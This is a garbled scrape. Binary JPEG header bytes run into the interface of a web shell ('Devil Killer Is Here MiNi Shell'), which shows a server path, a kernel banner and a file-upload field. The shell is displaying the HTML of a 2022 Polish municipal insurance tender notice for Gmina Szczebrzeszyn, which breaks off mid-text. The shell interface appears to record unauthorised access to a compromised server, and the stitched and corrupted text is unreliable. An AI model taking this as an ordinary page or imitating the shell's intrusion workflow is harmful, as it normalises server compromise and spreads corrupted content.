JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220324/0009784401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> UBEZPIECZENIE MAJĄTKU I INNYCH INTERESÓW GMINY SZCZEBRZESZYN </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SZCZEBRZESZYN</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950368606</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Tadeusza Kościuszki 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczebrzeszyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-460</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">84 6821095</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@szczebrzeszyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.szczebrzeszyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> UBEZPIECZENIE MAJĄTKU I INNYCH INTERESÓW GMINY SZCZEBRZESZYN </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-60604323-a9ec-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00097844</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00012884/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Ubezpieczenie majątku i innych interesów Gminy Szczebrzeszyn</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.szczebrzeszyn.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https:miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2.Adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia, bezpośrednio związane z postępowaniem o udzielenie zamówienia.<br/>2.1.Na stronie zamawiającego: www.bip.szczebrzeszyn.pl, zamieszczone są odnośniki (linki) odsyłające do dokumentacji postępowania znajdującej się na stronie systemu teleinformatycznego.<br/>2.2.Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej – za pośredni¬ctwem systemu teleinformatycznego, dostępnego na stronie internetowej pod adresem: www.bip.szczebrzeszyn.pl<br/>2.3.Stroną internetową prowadzonego postępowania jest strona systemu teleinformatycznego. Ilekroć w niniejszej SWZ mowa jest o stronie internetowej postępowania, należy przez to rozumieć stronę, na której pod wskazanym powyżej adresem funkcjonuje system teleinformatyczny.<br/>2.4.System teleinformatyczny, o którym mowa powyżej, spełnia wymagania określone w u.p.z.p., w szczególności w art. 64 i 68 ustawy oraz w § 11 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>2.4.1.Do połączenia z systemem używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Każdy wykonawca posiada w systemie dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z zamawiającym w pozostałych obszarach.<br/>2.4.2.Wymagania techniczne, które muszą spełniać urządzenia informatyczne w celu korzystania z systemu teleinformatycznego opisane zostały na stronie internetowej pod adresem: https://miniportal.uzp.gov.pl/WarunkiUslugi <br/>2.4.3.Dopuszczalne formaty przesyłanych danych: w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Ww. dokumenty składa się poprzez Platformę, dostępną pod adresem: www.miniportal.uzp.gov.pl<br/>2.4.4.Maksymalny rozmiar przesyłanych plików: wynosi 150 MB<br/>2.4.5.Kodowanie i oznaczenie czasu przekazania danych: czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Czas przekazania danych jest to czas, w którym zostanie potwierdzone złożenie oferty lub dokumentu przez wykonawcę. W przypadku wybrania opcji złożenia oferty lub dokumentu bez logowania, potwierdzenie odbywa się poprzez kliknięcie w link dostępny w wiadomości e-mail, wysłanej automatycznie po złożeniu oferty lub dokumentu. Wykonawca otrzymuje wiadomość na wskazany przez siebie adres e-mail. W przypadku wykonawcy zalogowanego w systemie teleinformatycznym, czas przekazania danych jest to czas wysłania dokumentu lub oferty przez system.<br/>2.4.6.Szczegółowe instrukcje dla wykonawców znajdują się na stronie: https://miniportal.uzp.gov.pl/Instrukcja użytkownika miniPortal-ePUAP.pdf <br/>2.4.7.Regulamin systemu teleinformatycznego dostępny jest pod adresem: https://miniportal.uzp.gov.pl/WarunkiUslugi <br/>2.4.8.Rejestracja do systemu teleinformatycznego dostępna jest pod adresem: https://miniportal.uzp.gov.pl/ <br/>2.4.9.Korzystanie z systemu teleinformatycznego jest bezpłatne.<br/>Pełną obsługę techniczną systemu teleinformatycznego świadczy jego administrator, Administratorem danych osobowych użytkowników systemu miniPortal jest Prezes Urzędu Zamówień Publicznych z siedzibą w Warszawie (02-676) przy ul. Postępu 17A. W przypadku ewentualnych problemów technicznych należy kontaktować się z infolinią techniczną 22 458 77 06; email: miniPortal@uzp.gov.pl<br/> W przypadku ewentualnych problemów technicznych należy kontaktować się z infolinią techniczną 22 458 77 06; email: miniPortal@uzp.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO)<br/>informujemy, że:<br/>1.	Administratorem Pana/Pani danych osobowych jest Burmistrz Gminy Szczebrzeszyn – Gmina Szczebrzeszyn pod adresem: Plac Tadeusza Kościuszki 1, 22-460 Szczebrzeszyn, tel. (84) 68-21-095, adres e-mail: um@szczebrzeszyn.pl<br/>2.	W sprawach dotyczących przetwarzania danych osobowych można kontaktować się z wyznaczonym Inspektorem Danych Osobowych poprzez e-mail: iodo@zeto.lublin.pl <br/>3. Pani/Pana dane osobowe przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego na: „UBEZPIECZENIE MAJĄTKU I INNYCH INTERESÓW GMINY SZCZEBRZESZYN” na podstawie art. 6 ust. 1 lit. c RODO – wypełnienie obowiązku prawnego ciążącego na administratorze w związku z art. 2 ust. 1 ustawy Prawo zamówień publicznych Dz. U. z 2021 r. poz. 1129;<br/>4. odbiorcami Pani/Pana danych osobowych mogą być podmioty uprawnione na mocy przepisów prawa oraz podmioty świadczące usługi serwisu lub wsparcia dla Urzędu.<br/>5. Pani/Pana dane osobowe zawarte w protokole postępowania wraz z załącznikami będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Pani/Pana dane osobowe zawarte w pozostałej dokumentacji będą przechowywane przez okres archiwalny zgodnie z wymaganiami prawnymi określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 18 stycznia 2011r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych.<br/>6. posiada Pani/Pan prawo dostępu do danych osobowych, ich sprostowania, ograniczenia oraz prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>7.	Podanie Pani/Pana danych osobowych jest obowiązkiem ustawowym, i ich niepodanie będzie skutkować brakiem możliwości wzięcia udziału w postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP 271.2.9.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.1.	Część I: Ubezpieczenie majątku i odpowiedzialności cywilnej Gminy Szczebrzeszyn. Zakres ubezpieczenia obejmuje:<br/>1)	ubezpieczenie mienia od wszystkich ryzyk,<br/>2)	ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk, <br/>3)	ubezpieczenie odpowiedzialności cywilnej,<br/>4)	ubezpieczenie NNW sołtysów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66515100-4 - Usługi ubezpieczenia od ognia</p> <p class="mb-0">66515400-7 - Usługi ubezpieczenia od skutków żywiołów</p> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <p class="mb-0">66516400-4 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-05-01 do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	cena - 85%<br/>2)	klauzule dodatkowe i inne postanowienia szczególne fakultatywne - 15%<br/><br/> „Cena”<br/>Maks. liczbę pkt. w kryterium „Cena” otrzyma oferta z najniższą ceną. Liczba punktów w kryterium „Cena” zostanie obliczona zgodnie ze wzorem:<br/>	Cena najtańszej ważnej oferty <br/>Cn =	----------------------------------------	× Kp	× Wc<br/>	Cena oferty badanej <br/>gdzie:<br/>Cn – liczba pkt. w kryterium „Cena”<br/>Kp – współczynnik proporcjonalności = 100<br/>Wc – waga procentowa dla kryterium „Cena”= 85%<br/>K. „Klauzule dod. i inne post. szczególne fakultatywne”<br/>Ocena ofert w kryterium „Klau. dod. i inne postanowienia szczególne fakultatywne”, zostanie dokonana na podstawie formularza zawartego w złożonej ofercie, z przyznaniem ocenianej ofercie „małych” punktów, określonych przy poszczególnych klauzulach podanych <br/>poniżej. Pkt „małe” za warunki pośrednie (zmodyfikowane przez wykonawców) nie będą przyznawane. Maks. liczbę „małych” punktów (100 pkt), otrzyma oferta tego wykonawcy, który przyjmie wszystkie klauz. dod. i inne post. szczególne fakult., a pozostałe oferty otrzymają odpowiednio mniej punktów, w zależności od przyjętych klauzul i postanowień. Liczba punktów w kryterium „Klauzule dodatkowe i inne post. szczeg. fakultatywne” zostanie obliczona zgodnie ze wzorem:<br/>	Imp <br/>Pp =	----------------------------------	× Kp	× Wk<br/>	100 pkt <br/>gdzie:<br/>Pp – liczba punktów w kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne”<br/>Imp – liczba „małych” pkt. przyznanych ocenianej ofercie za przyjęte klauzule dodatk. i inne postanowienia szczególne fakultatywne<br/>Kp – współczynnik prop. = 100<br/>Wk – waga procentowa dla kryterium „Klauzule dodatkowe i inne postan. szczególne fakultatywne” = 15%<br/>Wykaz klauzul dodatkowych i innych postanowień szczególnych fakultatywnych dotyczących I części zamówienia<br/>Ubezp. mienia od wszystkich ryzyk<br/>Przyjęcie podanej klauzuli przezornej sumy ubezpieczenia – 5 pkt<br/>Przyjęcie podanej klauzuli szkód powstałych wskutek powolnego oddziaływania – 4 pkt<br/>Przyjęcie podanej klauzuli aktów terroryzmu – 3 pkt<br/>Przyjęcie podanej klauzuli wyrównania sumy ubezpieczenia – 2 pkt<br/>Przyjęcie podanej klauzuli pokrycia kosztów naprawy uszkodzeń powstałych w mieniu otaczającym – 2 pkt<br/>Przyjęcie podanej klauzuli zmiany lokalizacji odbudowy – 3 pkt<br/>Zwiększ. do kwoty 8 000 000,00 zł bez składkowego limitu w klauzuli automatycznego pokrycia – 6 pkt<br/>Przyjęcie podanej klauzuli ubezpieczenia mienia wyłączonego z eksploatacji – 5 pkt<br/>Zniesienie franszyzy integralnej – 6 pkt<br/>Ubezp. sprzętu elektr. od wszystkich ryzyk<br/>Zwiększenie do kwoty 1 000 000,00 zł bez składkowego limitu w klauzuli automatycznego pokrycia – 4 pkt<br/>Przyjęcie podanej klauzuli cyber risk – 7 pkt<br/>Zniesienie udziału własnego – 6 pkt<br/>Ubezb. OC<br/>Zwiększenie obligatoryjnego limitu odpowiedzialności w ubezpieczeniu czystych strat fin. (m.in. w związku z wydaniem lub niewydaniem decyzji adm. lub aktów normatywnych) z 100 000,00 zł do 300 000,00 zł na jeden i wszystkie wypadki ubezpieczeniowe – 5 punkty<br/>Zwiększenie obligatoryjnego limitu odpowiedz. dla klauzuli reprezentantów w ubezpieczeniu OC z 100 000,00 zł do 300 000,00 zł na jeden i wszystkie wypadki ubezpieczeniowe – 5 pkt<br/>Objęcie ochroną ubezp. w zakresie klauzuli reprezentantów w ubezp. OC - do limitu w wysokości 100 000,00 zł na jeden i wszystkie wypadki ubezpieczeniowe – również reprezentantów ubezpieczającego/ubezp. – 5 pkt<br/>Zniesienie franszyzy integralnej w szkodach rzeczowych – 7 pkt<br/>Pozostałe klauzule dod. i postanowienia szczególne<br/>Przyjęcie podanej klauzuli funduszu prewencyjnego – 3 pkt<br/>Zwiększ. limitu w ryzyku katastrofy budowlanej do kwoty 10 000 000,00 zł (limit wspólny w ubezp. mienia i sprzętu elektr. od wszystkich ryzyk) – 6 pkt<br/>Przyjęcie podanej klauzuli automat. pokrycia konsumpcji sumy ubezp. w ubezp. mienia systemem pierwszego ryzyka – 3 pkt<br/>Przyjęcie podanej klau. uznania okoliczności – 3 pkt<br/>Przyjęcie podanej klau. zmiany wielkości ryzyka – 5 pkt Przyjęcie podanej klau. wypłaty bezspornej części odszkodowania – 5 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">85</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klzuzule dodatkowe i inne postanowienia szczególne faktultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.2.	Część II: Ubezpieczenie pojazdów mechanicznych Gminy Szczebrzeszyn. Zakres ubezpieczenia obejmuje: <br/>1)	obowiązkowe ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych,<br/>2)	ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych za szkody powstałe w związku z ruchem pojazdów na terenie państw należących do Systemu Zielonej Karty, a niebędących członkami Unii Europejskiej (tzw. ubezpieczenie Zielona Karta – ubezpieczenie bezskładkowe),<br/>3)	ubezpieczenie pojazdów od uszkodzenia i utraty auto casco,<br/>4)	ubezpieczenie następstw nieszczęśliwych wypadków kierowcy i pasażerów,<br/>5)	rozszerzone, odpłatne ubezpieczenie assistance,<br/>6)	ubezpieczenie mini assistance (ubezpieczenie bezskładkowe, jeśli wykonawca takie posiada). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66514110-0 - Usługi ubezpieczeń pojazdów mechanicznych</p> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66516100-1 - Usługi ubezpieczenia pojazdów mechanicznych od odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-05-01 do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">21.2.2.	Część II zamówienia<br/>1)	cena - 90%<br/>2)	klauzule dodatkowe i inne postanowienia szczególne fakultatywne - 10%<br/><br/>21.3.2.	Część II zamówienia<br/>21.3.2.1.	Kryterium „Cena”<br/>Maksymalną liczbę punktów w kryterium „Cena” otrzyma oferta z najniższą ceną. Liczba punktów w kryterium „Cena” zostanie obliczona zgodnie ze wzorem:<br/>	Cena najtańszej ważnej oferty <br/>Cn =	----------------------------------------	× Kp	× Wc<br/>	Cena oferty badanej <br/>gdzie:<br/>Cn – liczba punktów w kryterium „Cena”<br/>Kp – współczynnik proporcjonalności = 100<br/>Wc – waga procentowa dla kryterium „Cena” = 90%<br/>21.3.2.2.	Kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne”<br/>Ocena ofert w kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne”, zostanie dokonana na podstawie formularza zawartego w złożonej ofercie, z przyznaniem ocenianej ofercie „małych” punktów, określonych przy poszczególnych klauzulach podanych <br/>poniżej. Punkty „małe” za warunki pośrednie (zmodyfikowane przez wykonawców) nie będą przyznawane. Maksymalną liczbę „małych” punktów (100 pkt), otrzyma oferta tego wykonawcy, który przyjmie wszystkie klauzule dodatkowe i inne postanowienia szczególne fakultatywne, <br/>a pozostałe oferty otrzymają odpowiednio mniej punktów, w zależności od przyjętych klauzul i postanowień. Liczba punktów w kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne” zostanie obliczona zgodnie ze wzorem:<br/>	Imp <br/>Pp =	----------------------------------	× Kp	× Wk<br/>	100 pkt <br/>gdzie: <br/>Pp – liczba punktów w kryterium „Klauzule dodatkowe i inne 